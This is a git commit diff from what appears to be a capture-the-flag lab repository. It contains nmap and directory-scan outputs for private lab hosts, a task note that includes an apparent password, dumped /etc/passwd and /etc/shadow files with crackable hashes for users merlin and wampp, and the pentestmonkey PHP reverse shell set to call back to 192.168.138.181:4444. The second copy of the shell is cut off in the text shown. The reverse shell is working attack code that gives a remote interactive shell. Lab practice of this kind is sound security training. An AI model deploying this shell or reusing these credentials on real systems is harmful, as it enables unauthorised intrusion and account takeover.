2026-06-05
This commit is contained in:
@@ -0,0 +1 @@
|
|||||||
|
UWFwdyBFZWtjbCAtIFB2ciBSTUtQLi4uWFpXIFZXVVIuLi4gVFRJIFhFRi4uLiBMQUEgWlJHUVJPISEhIQpTZncuIEtham5tYiB4c2kgb3d1b3dnZQpGYXouIFRtbCBma2ZyIHFnc2VpayBhZyBvcWVpYngKRWxqd3guIFhpbCBicWkgYWlrbGJ5d3FlClJzZnYuIFp3ZWwgdnZtIGltZWwgc3VtZWJ0IGxxd2RzZmsKWWVqci4gVHFlbmwgVnN3IHN2bnQgInVycXNqZXRwd2JuIGVpbnlqYW11IiB3Zi4KCkl6IGdsd3cgQSB5a2Z0ZWYuLi4uIFFqaHN2Ym91dW9leGNtdndrd3dhdGZsbHh1Z2hoYmJjbXlkaXp3bGtic2lkaXVzY3ds
|
||||||
@@ -0,0 +1,8 @@
|
|||||||
|
Dads Tasks - The RAGE...THE CAGE... THE MAN... THE LEGEND!!!!
|
||||||
|
One. Revamp the website
|
||||||
|
Two. Put more quotes in script
|
||||||
|
Three. Buy bee pesticide
|
||||||
|
Four. Help him with acting lessons
|
||||||
|
Five. Teach Dad what "information security" is.
|
||||||
|
|
||||||
|
In case I forget.... Mydadisghostrideraintthatcoolnocausehesonfirejokes
|
||||||
@@ -0,0 +1,5 @@
|
|||||||
|
images [36m (Status: 301)[0m [Size: 315][34m [--> http://10.81.144.166/images/][0m
|
||||||
|
html [36m (Status: 301)[0m [Size: 313][34m [--> http://10.81.144.166/html/][0m
|
||||||
|
scripts [36m (Status: 301)[0m [Size: 316][34m [--> http://10.81.144.166/scripts/][0m
|
||||||
|
contracts [36m (Status: 301)[0m [Size: 318][34m [--> http://10.81.144.166/contracts/][0m
|
||||||
|
auditions [36m (Status: 301)[0m [Size: 318][34m [--> http://10.81.144.166/auditions/][0m
|
||||||
@@ -0,0 +1 @@
|
|||||||
|
10.81.144.166
|
||||||
@@ -0,0 +1,55 @@
|
|||||||
|
# Nmap 7.99 scan initiated Wed Apr 29 19:24:34 2026 as: /usr/lib/nmap/nmap --privileged -A -T4 -p- -oN nmap_scan01.txt 10.81.144.166
|
||||||
|
Nmap scan report for 10.81.144.166
|
||||||
|
Host is up (0.051s latency).
|
||||||
|
Not shown: 65532 closed tcp ports (reset)
|
||||||
|
PORT STATE SERVICE VERSION
|
||||||
|
21/tcp open ftp vsftpd 3.0.3
|
||||||
|
| ftp-syst:
|
||||||
|
| STAT:
|
||||||
|
| FTP server status:
|
||||||
|
| Connected to ::ffff:192.168.138.181
|
||||||
|
| Logged in as ftp
|
||||||
|
| TYPE: ASCII
|
||||||
|
| No session bandwidth limit
|
||||||
|
| Session timeout in seconds is 300
|
||||||
|
| Control connection is plain text
|
||||||
|
| Data connections will be plain text
|
||||||
|
| At session startup, client count was 4
|
||||||
|
| vsFTPd 3.0.3 - secure, fast, stable
|
||||||
|
|_End of status
|
||||||
|
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|
||||||
|
|_-rw-r--r-- 1 0 0 396 May 25 2020 dad_tasks
|
||||||
|
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
|
||||||
|
| ssh-hostkey:
|
||||||
|
| 2048 dd:fd:88:94:f8:c8:d1:1b:51:e3:7d:f8:1d:dd:82:3e (RSA)
|
||||||
|
| 256 3e:ba:38:63:2b:8d:1c:68:13:d5:05:ba:7a:ae:d9:3b (ECDSA)
|
||||||
|
|_ 256 c0:a6:a3:64:44:1e:cf:47:5f:85:f6:1f:78:4c:59:d8 (ED25519)
|
||||||
|
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|
||||||
|
|_http-server-header: Apache/2.4.29 (Ubuntu)
|
||||||
|
|_http-title: Nicholas Cage Stories
|
||||||
|
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
|
||||||
|
TCP/IP fingerprint:
|
||||||
|
OS:SCAN(V=7.99%E=4%D=4/29%OT=21%CT=1%CU=35349%PV=Y%DS=3%DC=T%G=Y%TM=69F23EF
|
||||||
|
OS:D%P=aarch64-unknown-linux-gnu)SEQ(TI=Z%CI=Z%II=I%TS=A)SEQ(SP=103%GCD=1%I
|
||||||
|
OS:SR=104%TI=Z%CI=Z%II=I%TS=A)SEQ(SP=103%GCD=1%ISR=10A%TI=Z%CI=Z%II=I%TS=A)
|
||||||
|
OS:SEQ(SP=103%GCD=1%ISR=10B%TI=Z%CI=Z%II=I%TS=A)SEQ(SP=104%GCD=1%ISR=10A%TI
|
||||||
|
OS:=Z%CI=Z%II=I%TS=A)OPS(O1=M4E8ST11NW7%O2=M4E8ST11NW7%O3=M4E8NNT11NW7%O4=M
|
||||||
|
OS:4E8ST11NW7%O5=M4E8ST11NW7%O6=M4E8ST11)WIN(W1=F4B3%W2=F4B3%W3=F4B3%W4=F4B
|
||||||
|
OS:3%W5=F4B3%W6=F4B3)ECN(R=Y%DF=Y%T=40%W=F507%O=M4E8NNSNW7%CC=Y%Q=)T1(R=Y%D
|
||||||
|
OS:F=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=
|
||||||
|
OS:Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF
|
||||||
|
OS:=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=
|
||||||
|
OS:%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G
|
||||||
|
OS:)IE(R=Y%DFI=N%T=40%CD=S)
|
||||||
|
|
||||||
|
Network Distance: 3 hops
|
||||||
|
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
|
||||||
|
|
||||||
|
TRACEROUTE (using port 1723/tcp)
|
||||||
|
HOP RTT ADDRESS
|
||||||
|
1 53.24 ms 192.168.128.1
|
||||||
|
2 ...
|
||||||
|
3 52.64 ms 10.81.144.166
|
||||||
|
|
||||||
|
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
|
||||||
|
# Nmap done at Wed Apr 29 19:25:17 2026 -- 1 IP address (1 host up) scanned in 42.58 seconds
|
||||||
@@ -0,0 +1 @@
|
|||||||
|
webdav [33m (Status: 401)[0m [Size: 460]
|
||||||
@@ -0,0 +1 @@
|
|||||||
|
10.82.161.192
|
||||||
@@ -0,0 +1,33 @@
|
|||||||
|
# Nmap 7.99 scan initiated Fri May 8 10:06:01 2026 as: /usr/lib/nmap/nmap --privileged -A -T4 -p- -oN nmap_scan_01.txt 10.82.161.192
|
||||||
|
Nmap scan report for 10.82.161.192
|
||||||
|
Host is up (0.049s latency).
|
||||||
|
Not shown: 65534 closed tcp ports (reset)
|
||||||
|
PORT STATE SERVICE VERSION
|
||||||
|
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|
||||||
|
|_http-title: Apache2 Ubuntu Default Page: It works
|
||||||
|
|_http-server-header: Apache/2.4.18 (Ubuntu)
|
||||||
|
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
|
||||||
|
TCP/IP fingerprint:
|
||||||
|
OS:SCAN(V=7.99%E=4%D=5/8%OT=80%CT=1%CU=35316%PV=Y%DS=3%DC=T%G=Y%TM=69FD99F6
|
||||||
|
OS:%P=aarch64-unknown-linux-gnu)SEQ(SP=104%GCD=1%ISR=10D%TI=Z%TS=8)SEQ(SP=1
|
||||||
|
OS:04%GCD=1%ISR=10D%TI=Z%CI=I%TS=A)SEQ(SP=107%GCD=1%ISR=10A%TI=Z%CI=I%TS=8)
|
||||||
|
OS:SEQ(SP=108%GCD=1%ISR=10C%TI=Z%CI=RD%TS=8)SEQ(SP=FD%GCD=1%ISR=102%TI=Z%CI
|
||||||
|
OS:=RD%TS=8)OPS(O1=M4E8ST11NW7%O2=M4E8ST11NW7%O3=M4E8NNT11NW7%O4=M4E8ST11NW
|
||||||
|
OS:7%O5=M4E8ST11NW7%O6=M4E8ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF
|
||||||
|
OS:%W6=68DF)ECN(R=Y%DF=Y%T=40%W=6903%O=M4E8NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%
|
||||||
|
OS:S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%
|
||||||
|
OS:RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W
|
||||||
|
OS:=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
|
||||||
|
OS:U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%D
|
||||||
|
OS:FI=N%T=40%CD=S)
|
||||||
|
|
||||||
|
Network Distance: 3 hops
|
||||||
|
|
||||||
|
TRACEROUTE (using port 143/tcp)
|
||||||
|
HOP RTT ADDRESS
|
||||||
|
1 51.06 ms 192.168.128.1
|
||||||
|
2 ...
|
||||||
|
3 55.30 ms 10.82.161.192
|
||||||
|
|
||||||
|
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
|
||||||
|
# Nmap done at Fri May 8 10:08:22 2026 -- 1 IP address (1 host up) scanned in 141.03 seconds
|
||||||
@@ -0,0 +1,22 @@
|
|||||||
|
# Nmap 7.99 scan initiated Fri May 8 10:09:35 2026 as: /usr/lib/nmap/nmap --privileged -sV --script http-headers -oN nmap_scan_02.txt 10.82.161.192
|
||||||
|
Nmap scan report for 10.82.161.192
|
||||||
|
Host is up (0.091s latency).
|
||||||
|
Not shown: 999 closed tcp ports (reset)
|
||||||
|
PORT STATE SERVICE VERSION
|
||||||
|
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|
||||||
|
|_http-server-header: Apache/2.4.18 (Ubuntu)
|
||||||
|
| http-headers:
|
||||||
|
| Date: Fri, 08 May 2026 08:09:44 GMT
|
||||||
|
| Server: Apache/2.4.18 (Ubuntu)
|
||||||
|
| Last-Modified: Mon, 26 Aug 2019 03:38:48 GMT
|
||||||
|
| ETag: "2c39-590fce4d4ea8c"
|
||||||
|
| Accept-Ranges: bytes
|
||||||
|
| Content-Length: 11321
|
||||||
|
| Vary: Accept-Encoding
|
||||||
|
| Connection: close
|
||||||
|
| Content-Type: text/html
|
||||||
|
|
|
||||||
|
|_ (Request type: HEAD)
|
||||||
|
|
||||||
|
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
|
||||||
|
# Nmap done at Fri May 8 10:09:44 2026 -- 1 IP address (1 host up) scanned in 9.19 seconds
|
||||||
@@ -0,0 +1,30 @@
|
|||||||
|
root:x:0:0:root:/root:/bin/bash
|
||||||
|
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
|
||||||
|
bin:x:2:2:bin:/bin:/usr/sbin/nologin
|
||||||
|
sys:x:3:3:sys:/dev:/usr/sbin/nologin
|
||||||
|
sync:x:4:65534:sync:/bin:/bin/sync
|
||||||
|
games:x:5:60:games:/usr/games:/usr/sbin/nologin
|
||||||
|
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
|
||||||
|
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
|
||||||
|
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
|
||||||
|
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
|
||||||
|
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
|
||||||
|
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
|
||||||
|
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
|
||||||
|
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
|
||||||
|
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
|
||||||
|
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
|
||||||
|
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
|
||||||
|
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
|
||||||
|
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
|
||||||
|
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
|
||||||
|
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
|
||||||
|
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
|
||||||
|
syslog:x:104:108::/home/syslog:/bin/false
|
||||||
|
_apt:x:105:65534::/nonexistent:/bin/false
|
||||||
|
messagebus:x:106:110::/var/run/dbus:/bin/false
|
||||||
|
uuidd:x:107:111::/run/uuidd:/bin/false
|
||||||
|
merlin:x:1000:1000:dav,,,:/home/merlin:/bin/bash
|
||||||
|
sshd:x:108:65534::/var/run/sshd:/usr/sbin/nologin
|
||||||
|
wampp:x:1001:1001:webdav,,,:/home/wampp:/bin/bash
|
||||||
|
|
||||||
Executable
+192
@@ -0,0 +1,192 @@
|
|||||||
|
<?php
|
||||||
|
// php-reverse-shell - A Reverse Shell implementation in PHP
|
||||||
|
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
|
||||||
|
//
|
||||||
|
// This tool may be used for legal purposes only. Users take full responsibility
|
||||||
|
// for any actions performed using this tool. The author accepts no liability
|
||||||
|
// for damage caused by this tool. If these terms are not acceptable to you, then
|
||||||
|
// do not use this tool.
|
||||||
|
//
|
||||||
|
// In all other respects the GPL version 2 applies:
|
||||||
|
//
|
||||||
|
// This program is free software; you can redistribute it and/or modify
|
||||||
|
// it under the terms of the GNU General Public License version 2 as
|
||||||
|
// published by the Free Software Foundation.
|
||||||
|
//
|
||||||
|
// This program is distributed in the hope that it will be useful,
|
||||||
|
// but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||||
|
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||||
|
// GNU General Public License for more details.
|
||||||
|
//
|
||||||
|
// You should have received a copy of the GNU General Public License along
|
||||||
|
// with this program; if not, write to the Free Software Foundation, Inc.,
|
||||||
|
// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
|
||||||
|
//
|
||||||
|
// This tool may be used for legal purposes only. Users take full responsibility
|
||||||
|
// for any actions performed using this tool. If these terms are not acceptable to
|
||||||
|
// you, then do not use this tool.
|
||||||
|
//
|
||||||
|
// You are encouraged to send comments, improvements or suggestions to
|
||||||
|
// me at pentestmonkey@pentestmonkey.net
|
||||||
|
//
|
||||||
|
// Description
|
||||||
|
// -----------
|
||||||
|
// This script will make an outbound TCP connection to a hardcoded IP and port.
|
||||||
|
// The recipient will be given a shell running as the current user (apache normally).
|
||||||
|
//
|
||||||
|
// Limitations
|
||||||
|
// -----------
|
||||||
|
// proc_open and stream_set_blocking require PHP version 4.3+, or 5+
|
||||||
|
// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.
|
||||||
|
// Some compile-time options are needed for daemonisation (like pcntl, posix). These are rarely available.
|
||||||
|
//
|
||||||
|
// Usage
|
||||||
|
// -----
|
||||||
|
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.
|
||||||
|
|
||||||
|
set_time_limit (0);
|
||||||
|
$VERSION = "1.0";
|
||||||
|
$ip = '192.168.138.181'; // CHANGE THIS
|
||||||
|
$port = 4444; // CHANGE THIS
|
||||||
|
$chunk_size = 1400;
|
||||||
|
$write_a = null;
|
||||||
|
$error_a = null;
|
||||||
|
$shell = 'uname -a; w; id; /bin/sh -i';
|
||||||
|
$daemon = 0;
|
||||||
|
$debug = 0;
|
||||||
|
|
||||||
|
//
|
||||||
|
// Daemonise ourself if possible to avoid zombies later
|
||||||
|
//
|
||||||
|
|
||||||
|
// pcntl_fork is hardly ever available, but will allow us to daemonise
|
||||||
|
// our php process and avoid zombies. Worth a try...
|
||||||
|
if (function_exists('pcntl_fork')) {
|
||||||
|
// Fork and have the parent process exit
|
||||||
|
$pid = pcntl_fork();
|
||||||
|
|
||||||
|
if ($pid == -1) {
|
||||||
|
printit("ERROR: Can't fork");
|
||||||
|
exit(1);
|
||||||
|
}
|
||||||
|
|
||||||
|
if ($pid) {
|
||||||
|
exit(0); // Parent exits
|
||||||
|
}
|
||||||
|
|
||||||
|
// Make the current process a session leader
|
||||||
|
// Will only succeed if we forked
|
||||||
|
if (posix_setsid() == -1) {
|
||||||
|
printit("Error: Can't setsid()");
|
||||||
|
exit(1);
|
||||||
|
}
|
||||||
|
|
||||||
|
$daemon = 1;
|
||||||
|
} else {
|
||||||
|
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
|
||||||
|
}
|
||||||
|
|
||||||
|
// Change to a safe directory
|
||||||
|
chdir("/");
|
||||||
|
|
||||||
|
// Remove any umask we inherited
|
||||||
|
umask(0);
|
||||||
|
|
||||||
|
//
|
||||||
|
// Do the reverse shell...
|
||||||
|
//
|
||||||
|
|
||||||
|
// Open reverse connection
|
||||||
|
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
|
||||||
|
if (!$sock) {
|
||||||
|
printit("$errstr ($errno)");
|
||||||
|
exit(1);
|
||||||
|
}
|
||||||
|
|
||||||
|
// Spawn shell process
|
||||||
|
$descriptorspec = array(
|
||||||
|
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
|
||||||
|
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
|
||||||
|
2 => array("pipe", "w") // stderr is a pipe that the child will write to
|
||||||
|
);
|
||||||
|
|
||||||
|
$process = proc_open($shell, $descriptorspec, $pipes);
|
||||||
|
|
||||||
|
if (!is_resource($process)) {
|
||||||
|
printit("ERROR: Can't spawn shell");
|
||||||
|
exit(1);
|
||||||
|
}
|
||||||
|
|
||||||
|
// Set everything to non-blocking
|
||||||
|
// Reason: Occsionally reads will block, even though stream_select tells us they won't
|
||||||
|
stream_set_blocking($pipes[0], 0);
|
||||||
|
stream_set_blocking($pipes[1], 0);
|
||||||
|
stream_set_blocking($pipes[2], 0);
|
||||||
|
stream_set_blocking($sock, 0);
|
||||||
|
|
||||||
|
printit("Successfully opened reverse shell to $ip:$port");
|
||||||
|
|
||||||
|
while (1) {
|
||||||
|
// Check for end of TCP connection
|
||||||
|
if (feof($sock)) {
|
||||||
|
printit("ERROR: Shell connection terminated");
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
|
||||||
|
// Check for end of STDOUT
|
||||||
|
if (feof($pipes[1])) {
|
||||||
|
printit("ERROR: Shell process terminated");
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
|
||||||
|
// Wait until a command is end down $sock, or some
|
||||||
|
// command output is available on STDOUT or STDERR
|
||||||
|
$read_a = array($sock, $pipes[1], $pipes[2]);
|
||||||
|
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
|
||||||
|
|
||||||
|
// If we can read from the TCP socket, send
|
||||||
|
// data to process's STDIN
|
||||||
|
if (in_array($sock, $read_a)) {
|
||||||
|
if ($debug) printit("SOCK READ");
|
||||||
|
$input = fread($sock, $chunk_size);
|
||||||
|
if ($debug) printit("SOCK: $input");
|
||||||
|
fwrite($pipes[0], $input);
|
||||||
|
}
|
||||||
|
|
||||||
|
// If we can read from the process's STDOUT
|
||||||
|
// send data down tcp connection
|
||||||
|
if (in_array($pipes[1], $read_a)) {
|
||||||
|
if ($debug) printit("STDOUT READ");
|
||||||
|
$input = fread($pipes[1], $chunk_size);
|
||||||
|
if ($debug) printit("STDOUT: $input");
|
||||||
|
fwrite($sock, $input);
|
||||||
|
}
|
||||||
|
|
||||||
|
// If we can read from the process's STDERR
|
||||||
|
// send data down tcp connection
|
||||||
|
if (in_array($pipes[2], $read_a)) {
|
||||||
|
if ($debug) printit("STDERR READ");
|
||||||
|
$input = fread($pipes[2], $chunk_size);
|
||||||
|
if ($debug) printit("STDERR: $input");
|
||||||
|
fwrite($sock, $input);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
fclose($sock);
|
||||||
|
fclose($pipes[0]);
|
||||||
|
fclose($pipes[1]);
|
||||||
|
fclose($pipes[2]);
|
||||||
|
proc_close($process);
|
||||||
|
|
||||||
|
// Like print, but does nothing if we've daemonised ourself
|
||||||
|
// (I can't figure out how to redirect STDOUT like a proper daemon)
|
||||||
|
function printit ($string) {
|
||||||
|
if (!$daemon) {
|
||||||
|
print "$string\n";
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
?>
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
@@ -0,0 +1,30 @@
|
|||||||
|
root:!:18134:0:99999:7:::
|
||||||
|
daemon:*:17953:0:99999:7:::
|
||||||
|
bin:*:17953:0:99999:7:::
|
||||||
|
sys:*:17953:0:99999:7:::
|
||||||
|
sync:*:17953:0:99999:7:::
|
||||||
|
games:*:17953:0:99999:7:::
|
||||||
|
man:*:17953:0:99999:7:::
|
||||||
|
lp:*:17953:0:99999:7:::
|
||||||
|
mail:*:17953:0:99999:7:::
|
||||||
|
news:*:17953:0:99999:7:::
|
||||||
|
uucp:*:17953:0:99999:7:::
|
||||||
|
proxy:*:17953:0:99999:7:::
|
||||||
|
www-data:*:17953:0:99999:7:::
|
||||||
|
backup:*:17953:0:99999:7:::
|
||||||
|
list:*:17953:0:99999:7:::
|
||||||
|
irc:*:17953:0:99999:7:::
|
||||||
|
gnats:*:17953:0:99999:7:::
|
||||||
|
nobody:*:17953:0:99999:7:::
|
||||||
|
systemd-timesync:*:17953:0:99999:7:::
|
||||||
|
systemd-network:*:17953:0:99999:7:::
|
||||||
|
systemd-resolve:*:17953:0:99999:7:::
|
||||||
|
systemd-bus-proxy:*:17953:0:99999:7:::
|
||||||
|
syslog:*:17953:0:99999:7:::
|
||||||
|
_apt:*:17953:0:99999:7:::
|
||||||
|
messagebus:*:18134:0:99999:7:::
|
||||||
|
uuidd:*:18134:0:99999:7:::
|
||||||
|
merlin:$1$EWeeql.h$8mH.7rEhPRGsOb5ECtmIe1:18134:0:99999:7:::
|
||||||
|
sshd:*:18134:0:99999:7:::
|
||||||
|
wampp:$6$f8LMirW0$43znQ5kMsELDO9BdUmhbGkUEnVH2OKXZjfEtsyUgbvL79KoJtgLkdbJpHw4OuDDIMtaXjGjkjaRKDv1FFxKsr/:18134:0:99999:7:::
|
||||||
|
|
||||||
@@ -0,0 +1 @@
|
|||||||
|
wampp:
|
||||||
@@ -0,0 +1 @@
|
|||||||
|
files [36m (Status: 301)[0m [Size: 314][34m [--> http://10.81.179.111/files/][0m
|
||||||
Binary file not shown.
Binary file not shown.
|
After Width: | Height: | Size: 246 KiB |
@@ -0,0 +1 @@
|
|||||||
|
10.81.179.111
|
||||||
@@ -0,0 +1,57 @@
|
|||||||
|
# Nmap 7.99 scan initiated Wed Apr 29 18:08:32 2026 as: /usr/lib/nmap/nmap --privileged -A -T4 -p- -oN nmap_scan01.txt 10.81.179.111
|
||||||
|
Nmap scan report for 10.81.179.111
|
||||||
|
Host is up (0.051s latency).
|
||||||
|
Not shown: 65532 closed tcp ports (reset)
|
||||||
|
PORT STATE SERVICE VERSION
|
||||||
|
21/tcp open ftp vsftpd 3.0.3
|
||||||
|
| ftp-syst:
|
||||||
|
| STAT:
|
||||||
|
| FTP server status:
|
||||||
|
| Connected to 192.168.138.181
|
||||||
|
| Logged in as ftp
|
||||||
|
| TYPE: ASCII
|
||||||
|
| No session bandwidth limit
|
||||||
|
| Session timeout in seconds is 300
|
||||||
|
| Control connection is plain text
|
||||||
|
| Data connections will be plain text
|
||||||
|
| At session startup, client count was 4
|
||||||
|
| vsFTPd 3.0.3 - secure, fast, stable
|
||||||
|
|_End of status
|
||||||
|
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|
||||||
|
| drwxrwxrwx 2 65534 65534 4096 Nov 12 2020 ftp [NSE: writeable]
|
||||||
|
| -rw-r--r-- 1 0 0 251631 Nov 12 2020 important.jpg
|
||||||
|
|_-rw-r--r-- 1 0 0 208 Nov 12 2020 notice.txt
|
||||||
|
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
|
||||||
|
| ssh-hostkey:
|
||||||
|
| 2048 b9:a6:0b:84:1d:22:01:a4:01:30:48:43:61:2b:ab:94 (RSA)
|
||||||
|
| 256 ec:13:25:8c:18:20:36:e6:ce:91:0e:16:26:eb:a2:be (ECDSA)
|
||||||
|
|_ 256 a2:ff:2a:72:81:aa:a2:9f:55:a4:dc:92:23:e6:b4:3f (ED25519)
|
||||||
|
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|
||||||
|
|_http-title: Maintenance
|
||||||
|
|_http-server-header: Apache/2.4.18 (Ubuntu)
|
||||||
|
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
|
||||||
|
TCP/IP fingerprint:
|
||||||
|
OS:SCAN(V=7.99%E=4%D=4/29%OT=21%CT=1%CU=30469%PV=Y%DS=3%DC=T%G=Y%TM=69F22D2
|
||||||
|
OS:C%P=aarch64-unknown-linux-gnu)SEQ(SP=103%GCD=1%ISR=105%TI=Z%CI=I%II=I%TS
|
||||||
|
OS:=8)SEQ(SP=104%GCD=1%ISR=109%TI=Z%CI=I%II=I%TS=8)SEQ(SP=106%GCD=1%ISR=109
|
||||||
|
OS:%TI=Z%CI=I%II=I%TS=8)SEQ(SP=107%GCD=1%ISR=10A%TI=Z%CI=I%II=I%TS=8)SEQ(SP
|
||||||
|
OS:=108%GCD=1%ISR=108%TI=Z%CI=I%II=I%TS=8)OPS(O1=M4E8ST11NW7%O2=M4E8ST11NW7
|
||||||
|
OS:%O3=M4E8NNT11NW7%O4=M4E8ST11NW7%O5=M4E8ST11NW7%O6=M4E8ST11)WIN(W1=68DF%W
|
||||||
|
OS:2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN(R=Y%DF=Y%T=40%W=6903%O=M4E8NN
|
||||||
|
OS:SNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y
|
||||||
|
OS:%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR
|
||||||
|
OS:%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40
|
||||||
|
OS:%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G
|
||||||
|
OS:%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
|
||||||
|
|
||||||
|
Network Distance: 3 hops
|
||||||
|
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
|
||||||
|
|
||||||
|
TRACEROUTE (using port 80/tcp)
|
||||||
|
HOP RTT ADDRESS
|
||||||
|
1 47.91 ms 192.168.128.1
|
||||||
|
2 ...
|
||||||
|
3 50.26 ms 10.81.179.111
|
||||||
|
|
||||||
|
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
|
||||||
|
# Nmap done at Wed Apr 29 18:09:16 2026 -- 1 IP address (1 host up) scanned in 44.08 seconds
|
||||||
Executable
+192
@@ -0,0 +1,192 @@
|
|||||||
|
<?php
|
||||||
|
// php-reverse-shell - A Reverse Shell implementation in PHP
|
||||||
|
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
|
||||||
|
//
|
||||||
|
// This tool may be used for legal purposes only. Users take full responsibility
|
||||||
|
// for any actions performed using this tool. The author accepts no liability
|
||||||
|
// for damage caused by this tool. If these terms are not acceptable to you, then
|
||||||
|
// do not use this tool.
|
||||||
|
//
|
||||||
|
// In all other respects the GPL version 2 applies:
|
||||||
|
//
|
||||||
|
// This program is free software; you can redistribute it and/or modify
|
||||||
|
// it under the terms of the GNU General Public License version 2 as
|
||||||
|
// published by the Free Software Foundation.
|
||||||
|
//
|
||||||
|
// This program is distributed in the hope that it will be useful,
|
||||||
|
// but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||||
|
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||||
|
// GNU General Public License for more details.
|
||||||
|
//
|
||||||
|
// You should have received a copy of the GNU General Public License along
|
||||||
|
// with this program; if not, write to the Free Software Foundation, Inc.,
|
||||||
|
// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
|
||||||
|
//
|
||||||
|
// This tool may be used for legal purposes only. Users take full responsibility
|
||||||
|
// for any actions performed using this tool. If these terms are not acceptable to
|
||||||
|
// you, then do not use this tool.
|
||||||
|
//
|
||||||
|
// You are encouraged to send comments, improvements or suggestions to
|
||||||
|
// me at pentestmonkey@pentestmonkey.net
|
||||||
|
//
|
||||||
|
// Description
|
||||||
|
// -----------
|
||||||
|
// This script will make an outbound TCP connection to a hardcoded IP and port.
|
||||||
|
// The recipient will be given a shell running as the current user (apache normally).
|
||||||
|
//
|
||||||
|
// Limitations
|
||||||
|
// -----------
|
||||||
|
// proc_open and stream_set_blocking require PHP version 4.3+, or 5+
|
||||||
|
